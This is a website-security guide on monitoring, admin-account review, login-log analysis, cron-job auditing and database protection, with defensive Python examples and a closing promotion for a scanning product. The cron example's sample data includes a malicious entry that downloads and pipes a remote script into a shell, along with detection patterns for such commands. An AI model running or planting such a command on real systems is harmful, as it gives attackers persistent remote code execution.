Building defenses for your website is essential; these days it is effectively mandatory. It is dangerous, however, to rely on them completely. You also need to keep checking the website itself, with automated tools and by hand, and to keep asking yourself one question: "how can I know if the website is safe?"
How can I know if the website is safe?
If you ask a security expert "how can I know if the website is safe?", they will point you to five key areas to check: automated monitoring, your admin users, user activity, your scheduled tasks (Cron jobs), and your database.
Automated monitoring
No single human can monitor a website 24/7/365. Even a whole team (and you would need a fairly large team even for a small website) would still be subject to fatigue and human error. Automated scanners, by contrast, will happily run 24/7/365 without tiring. They are not infallible, though: a scanner only finds what it has been configured and updated to detect, so it reduces the chance of something slipping through rather than eliminating it, and its findings still need a human to act on them.
A vulnerability scanner looks for weaknesses in your site (outdated software, known vulnerabilities, misconfigurations). It is usually paired with two other components: malware scanning, which looks for malicious code already present on the site, and a web application firewall (WAF), which blocks attack traffic before it reaches the application. Having these three in place goes a long way toward keeping your website safe. Many vendors bundle them with extra services, so you can get a lot of security for relatively little money.
You also want a robust anti-malware product (with an integrated firewall) on every device you use to administer the website, particularly anything that can reach the back end. That means mobile devices as well as regular computers: a compromised administrator laptop bypasses every defense on the server, because the attacker simply logs in with your credentials.
Checking your admin users
This measure requires no technical skill at all. Keep a regular eye on your user accounts and act immediately if you notice anything untoward, most notably an account that looks like it shouldn't be there. The safest approach is to disable (or delete) the account first and ask questions afterward; disabling rather than deleting has the advantage of preserving evidence of how and when the account was created.
If it turns out the account was created legitimately, you can always restore or recreate it. Either way, you then need to work out how it came to be created without the proper authorization and records being made.
Speaking of records, be very clear that user accounts, especially admin accounts, are for the use of the designated person only. Sharing credentials should be explicitly banned, not least because a shared account makes your login log useless for telling who actually did what.
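The review above can be done by hand, but it is easy to get wrong on a site with more than a handful of users. The following script is an added example, not code from the original article or from any product it mentions: it compares the accounts that actually exist on the site against an approved roster (the "record" of who was authorized to hold which role) and flags anything holding admin rights without a matching entry. The user records, the roster, the role names and the field names are all constructed assumptions; in practice you would load the records from your platform's user export or database.

```python
"""Compare the accounts that exist on a site against an approved roster.

Added example, not from the original article. The record format, the role
names and the roster itself are assumptions; adapt them to however your
platform exports its users (a CMS user export, a SQL query, an API call).
"""

# Constructed sample export of live accounts (made up, not real users).
ACCOUNTS = [
    {"username": "alice", "role": "administrator"},
    {"username": "bob", "role": "editor"},
    {"username": "carol", "role": "administrator"},     # roster says editor
    {"username": "svc_backup", "role": "administrator"},  # not on the roster at all
    {"username": "dave", "role": "subscriber"},
]

# The approved roster: username -> role that was authorized and recorded.
# This is the document the page calls "records"; keep it outside the website.
ROSTER = {
    "alice": "administrator",
    "bob": "editor",
    "carol": "editor",
    "dave": "subscriber",
}

PRIVILEGED_ROLES = {"administrator"}


def review_accounts(accounts, roster, privileged_roles=PRIVILEGED_ROLES):
    """Return a list of (username, finding) pairs for anything needing action.

    Findings:
      unknown-admin    privileged account that is not on the roster at all
      role-escalated   roster account that now holds a privileged role it was not given
      role-mismatch    roster account whose (non-privileged) role differs from the record
      unknown-account  non-privileged account missing from the roster (lower priority)
      roster-only      roster entry with no live account (the roster is stale)
    """
    findings = []
    seen = set()
    for acct in accounts:
        name, role = acct["username"], acct["role"]
        seen.add(name)
        expected = roster.get(name)
        if expected is None:
            findings.append((name, "unknown-admin" if role in privileged_roles
                             else "unknown-account"))
        elif role != expected:
            if role in privileged_roles and expected not in privileged_roles:
                findings.append((name, "role-escalated"))
            else:
                findings.append((name, "role-mismatch"))
    for name in roster:
        if name not in seen:
            findings.append((name, "roster-only"))
    return findings


def accounts_to_disable(findings):
    """Usernames to disable right away: anything holding admin rights without a record."""
    return sorted(name for name, finding in findings
                  if finding in {"unknown-admin", "role-escalated"})


if __name__ == "__main__":
    findings = review_accounts(ACCOUNTS, ROSTER)
    for name, finding in findings:
        print(f"{finding:16} {name}")
    print("disable now:", accounts_to_disable(findings))
```

Run against the constructed data, the script reports `carol` as escalated (the roster recorded her as an editor) and `svc_backup` as an admin nobody recorded, and lists both for immediate disabling; the page's advice to act first and investigate afterward then applies to exactly those two accounts.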
Monitoring user activity
This can be partly automated but does benefit from some manual checking. Most platforms let you lock an account (or block a source address) after a certain number of failed login attempts, and log users out after a certain period of idleness. Both are highly recommended. You can usually also remove accounts that have not logged in at all for a certain period.
This may sound harsh, but you are probably doing them a favor as well as yourself. If they are not using your site, their details do not need to be at risk if you are compromised, and you do not need the risk of a dormant account being used to attack your website (even non-admin accounts can do damage). As with the admin accounts, they can always recreate the account if they want it.
In terms of manual checks, as a minimum keep an eye on login activity; there should be a log of it. Ideally, also watch what users do once they are logged in. There will generally be a log of error messages as well: keep an eye on that too, because a sudden burst of errors is often the first visible sign of someone probing the site.
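Two of the checks just described, spotting failed-login bursts that should trigger a lockout and finding accounts that have gone dormant, can both be read straight out of the login log. The script below is an added example, not code from the original article or from any product it mentions. The log format it parses (one line per attempt with an ISO-8601 UTC timestamp, result, user and source IP) is an assumption, as are the sample lines, which are constructed and use documentation address ranges; change `LINE_RE` to match what your platform or web server actually writes.

```python
"""Detection logic over login-log lines: failed-login bursts and dormant accounts.

Added example, not from the original article. The log format is an assumption
(one line per attempt: ISO-8601 UTC timestamp, result, user, ip); adjust
LINE_RE to whatever your platform actually logs.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})Z login (?P<result>OK|FAIL) "
    r"user=(?P<user>\S+) ip=(?P<ip>\S+)$"
)

# Constructed sample log (not real traffic); 203.0.113.0/24 and 198.51.100.0/24
# are documentation ranges.
SAMPLE_LOG = """\
2024-05-01T09:12:03Z login OK user=alice ip=198.51.100.7
2024-05-02T14:40:11Z login OK user=bob ip=198.51.100.8
2024-05-06T02:13:07Z login FAIL user=admin ip=203.0.113.9
2024-05-06T02:13:09Z login FAIL user=admin ip=203.0.113.9
2024-05-06T02:13:12Z login FAIL user=administrator ip=203.0.113.9
2024-05-06T02:13:15Z login FAIL user=alice ip=203.0.113.9
2024-05-06T02:13:19Z login FAIL user=alice ip=203.0.113.9
2024-05-06T02:13:22Z login FAIL user=bob ip=203.0.113.9
2024-05-06T08:01:44Z login FAIL user=alice ip=198.51.100.7
2024-05-06T08:01:58Z login OK user=alice ip=198.51.100.7
""".splitlines()


def parse(lines):
    """Yield (timestamp, result, user, ip); lines that do not match are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)
            yield ts, m["result"], m["user"], m["ip"]


def failed_login_bursts(lines, threshold=5, window=timedelta(minutes=10)):
    """Return {ip: time_of_threshold_failure} for every source that reaches
    `threshold` failures inside a sliding `window`.

    Keyed by source IP rather than by user: an attacker spraying passwords
    rotates usernames, so a per-user counter alone would never trip.
    """
    recent = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    bursts = {}
    for ts, result, _user, ip in parse(lines):
        if result != "FAIL":
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ip not in bursts:
            bursts[ip] = ts
    return bursts


def dormant_users(lines, known_users, now, max_idle=timedelta(days=90)):
    """Known users with no successful login within `max_idle` of `now` (or ever).

    `now` may be a datetime or an ISO-8601 string such as "2024-08-01T00:00:00+00:00".
    """
    if isinstance(now, str):
        now = datetime.fromisoformat(now)
    last_ok = {}
    for ts, result, user, _ip in parse(lines):
        if result == "OK":
            last_ok[user] = max(ts, last_ok.get(user, ts))
    return sorted(u for u in known_users if u not in last_ok or now - last_ok[u] > max_idle)


if __name__ == "__main__":
    print("lockout candidates:", failed_login_bursts(SAMPLE_LOG))
    print("dormant:", dormant_users(SAMPLE_LOG, {"alice", "bob", "carol"},
                                    "2024-08-01T00:00:00+00:00"))
```

On the constructed log, `203.0.113.9` crosses five failures at 02:13:19 after trying three different usernames, which is the pattern a per-account lockout misses and a per-source block catches; `alice`'s single typo from her usual address is correctly ignored. With a 90-day idle limit measured from 1 August, `bob` and the never-seen `carol` come out as dormant while `alice` does not.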
Checking your scheduled tasks (Cron jobs)
Attackers will often schedule tasks to run when nobody is likely to notice, unless of course you make a point of keeping an eye on them. Reviewing your scheduled tasks (cron on Linux, Task Scheduler on Windows, and any scheduler built into your CMS or hosting panel) acts as a double-check on your system logs: a task you did not create is evidence of compromise even if the log entries that would have recorded its creation have since been cleared. Compare what is scheduled now against a known-good copy you keep off the server, and treat anything that has appeared in the meantime as suspect until you can explain it.
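What the comparison looks like in practice, as an added example that is not code from the original article or from any product it mentions: the script below snapshots the standard cron locations on a Linux host, diffs the result against a saved baseline, and flags new entries that match a few common indicators (running from a world-writable temp directory, piping a download straight into a shell, decoding base64 at run time). The list of cron paths is the usual Debian/Ubuntu and RHEL-family layout and the indicator patterns are heuristics, not a complete rule set; both are assumptions to adjust for your system. The two crontab texts in the block are constructed for the demonstration.

```python
"""Snapshot a Linux host's scheduled tasks and diff them against a saved baseline.

Added example, not from the original article. CRON_LOCATIONS is the usual
Debian/Ubuntu and RHEL-family layout (an assumption: check your distribution),
and SUSPICIOUS holds common indicators, not a complete detection rule.
"""
import glob
import os
import re

CRON_LOCATIONS = [
    "/etc/crontab",
    "/etc/cron.d/*",
    "/etc/cron.hourly/*", "/etc/cron.daily/*", "/etc/cron.weekly/*", "/etc/cron.monthly/*",
    "/var/spool/cron/crontabs/*",  # per-user crontabs on Debian/Ubuntu
    "/var/spool/cron/*",           # per-user crontabs on RHEL/CentOS
]

SUSPICIOUS = [
    (re.compile(r"(^|[\s=:])/(tmp|var/tmp|dev/shm)/"), "runs from a world-writable temp dir"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "downloads and pipes into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes base64 at run time"),
]

# Constructed sample crontabs: the baseline you saved earlier and what is on the box now.
BASELINE_TEXT = """# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0 3 * * * root /usr/local/bin/backup.sh
"""
CURRENT_TEXT = """# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root curl -s http://203.0.113.5/u.sh | sh
@reboot root /tmp/.x/sync
"""


def parse_entries(path, text):
    """Set of 'path: entry' strings, one per non-comment, non-blank line of a cron file."""
    entries = set()
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            entries.add(f"{path}: {line}")
    return entries


def cron_files(patterns=CRON_LOCATIONS):
    """Every existing regular file matched by the location patterns."""
    for pat in patterns:
        for path in sorted(glob.glob(pat)):
            if os.path.isfile(path):
                yield path


def snapshot(paths):
    """Union of parse_entries over the given files; unreadable files are skipped
    (run as root to see per-user crontabs)."""
    entries = set()
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                entries |= parse_entries(path, fh.read())
        except OSError:
            continue
    return entries


def diff(baseline, current):
    """(added, removed) entry lists relative to the baseline."""
    return sorted(current - baseline), sorted(baseline - current)


def flag_suspicious(entries):
    """[(entry, reason), ...] for entries matching one of the indicator heuristics."""
    return [(e, reason) for e in sorted(entries)
            for pattern, reason in SUSPICIOUS if pattern.search(e)]


def demo():
    """Run the diff on the constructed sample texts; returns (added, removed, hits)."""
    added, removed = diff(parse_entries("/etc/crontab", BASELINE_TEXT),
                          parse_entries("/etc/crontab", CURRENT_TEXT))
    return added, removed, flag_suspicious(added)


if __name__ == "__main__":
    added, removed, hits = demo()
    print("added:", *added, sep="\n  ")
    print("removed:", *removed, sep="\n  ")
    print("suspicious:", *[f"{r}: {e}" for e, r in hits], sep="\n  ")
    # Against a live host: snapshot(cron_files()) and diff it with a baseline you stored off-box.
```

On the constructed data the diff reports two new entries (a five-minute job that fetches and executes a remote script, and a reboot hook living under /tmp) and one missing entry (the backup job), and both new entries trip an indicator. Keep the baseline off the server: an attacker who can edit the crontab can just as easily edit a baseline stored beside it.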
Securing your database
Some attacks are just about making mischief, but these days most are about making money. That makes your database the main prize, and it needs to be protected accordingly.
First of all, make sure that you are only collecting data you actually need. The less data you hold, the less attractive your database is to attackers and the less exposed you are if it is breached.
Secondly, if you are holding any personal data at all, then every copy of that data must be stored encrypted. This includes backups and archives as well as production data, and the encryption keys must be kept separately from the data they protect, or the encryption buys you nothing when the backup is stolen.
Thirdly, limit access to your database to the people and applications that really need it, give each of them only the privileges they need, and grant access only for as long as it is actually needed. Again, sharing login details should be explicitly banned: every person and every application should connect with its own account, so that a leaked credential can be revoked without taking anything else down and the database's own logs show who did what.
Please click here now to have your website scanned, for free, by cWatch from Comodo.